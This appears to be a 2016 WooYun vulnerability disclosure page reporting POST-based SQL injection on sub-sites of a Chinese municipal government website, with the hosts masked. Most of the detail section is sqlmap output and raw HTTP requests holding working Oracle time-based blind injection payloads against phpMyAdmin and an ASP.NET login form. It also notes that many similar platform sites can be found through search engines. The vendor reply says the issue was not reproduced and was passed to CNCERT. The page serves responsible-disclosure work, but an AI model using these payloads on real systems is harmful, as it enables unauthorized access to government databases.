当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168977

漏洞标题:某市政府网分站点存在post注入漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2016-01-17 16:28

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-17: 细节已通知厂商并且等待厂商处理中
2016-01-20: 厂商已经确认,细节仅向厂商公开
2016-01-30: 细节向核心白帽子及相关领域专家公开
2016-02-09: 细节向普通白帽子公开
2016-02-19: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

RT

详细说明:

phpmyadmin 地址泄露
http://**.**.**.**/db/index.php
版本是2.11.1
注入点:"http://**.**.**.**/db/index.php?lang=zh-gb2312&co
nvcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=2cf2e60511edfbfd
d010d7be7ad32f33"

POST data: pma_username=&pma_password=&server=1&lang=zh-gb2312&convcharset=iso-8
859-1
do you want to test this form? [Y/n/q]
> y
Edit POST data [default: pma_username=&pma_password=&server=1&lang=zh-gb2312&con
vcharset=iso-8859-1] (Warning: blank fields detected):
do you want to fill blank fields with random values? [Y/n] n
[15:44:44] [INFO] using 'C:\sqlmap\output\**.**.**.**\session' as session
file
[15:44:44] [INFO] resuming injection data from session file
[15:44:44] [INFO] resuming back-end DBMS 'oracle' from session file
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: server
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: collation_connection=utf8_unicode_ci&convcharset=iso-8859-1&server=
1) AND 9468=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(111)||CHR(117)||CHR(74),5) AN
D (6861=6861&lang=zh-gb2312
---
do you want to exploit this SQL injection? [Y/n] y
[15:44:47] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Oracle


第二个注入站点:http://**.**.**.**/IPhone4/Login.aspx

POST /IPhone4/Login.aspx HTTP/1.1
Host: **.**.**.**
Content-Length: 369
Cache-Control: max-age=0
Origin: http://**.**.**.**
Upgrade-Insecure-Requests: 1
Referer: http://**.**.**.**/IPhone4/Login.aspx
Accept-Encoding: gzip, deflate
__VIEWSTATE=%2FwEPDwUKLTExMDcwNDM4OA9kFgJmD2QWAgIDDw9kFgIeCG9uY2hhbmdlBRNBbnRpU3FsVmFsaWQodGhpcyk7ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUIYnRuTG9naW4FDEltYWdlQnV0dG9uMftaawGQ1UcrtskTl0Mslv1yonr%2F&__EVENTVALIDATION=%2FwEWBQLJxePqBwKj1dLzBwKC3IeGDALG8eCkDwLSwpnTCDbU6RHeNSzhZgnLugzDGGYJjnfo&txtUserCode=13888888888&btnLogin.x=37&btnLogin.y=23&txtUserPwd=6666


Cache-Control → private, max-age=10800, pre-check=10800
Connection → close
Content-Type → text/html; charset=gb2312
Date → Sun, 10 Jan 2016 14:24:30 GMT
Expires → Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified → Thu, 20 Sep 2007 16:35:26 GMT
Server → Microsoft-IIS/6.0
X-Powered-By → ASP.NET


漏洞证明:

Title: Oracle AND time-based blind
Payload: __VIEWSTATE=/wEPDwUKLTExMDcwNDM4OA9kFgJmD2QWAgIDDw9kFgIeCG9uY2hhbmd
lBRNBbnRpU3FsVmFsaWQodGhpcyk7ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgU
IYnRuTG9naW4FDEltYWdlQnV0dG9uMftaawGQ1UcrtskTl0Mslv1yonr/') AND 4326=DBMS_PIPE.R
ECEIVE_MESSAGE(CHR(117)||CHR(104)||CHR(88)||CHR(90),5) AND ('JHjr'='JHjr&__EVENT
VALIDATION=/wEWBQLJxePqBwKj1dLzBwKC3IeGDALG8eCkDwLSwpnTCDbU6RHeNSzhZgnLugzDGGYJj
nfo&txtUserCode=&btnLogin.x=1&btnLogin.y=1&txtUserPwd=
---


通过搜索引擎联合查询,发现 移动办公申报平台 都有多个站点

1.1.png


2.png


Test parameter: __VIEWSTATE
Host IP: **.**.**.**
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: Oracle
Page Found: http://**.**.**.**/login.html
N

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-01-20 14:48

厂商回复:

CNVD确认未复现所述情况,已经转由CNCERT下发给广东分中心,由其后续协调网站管理单位处置.

最新状态:

暂无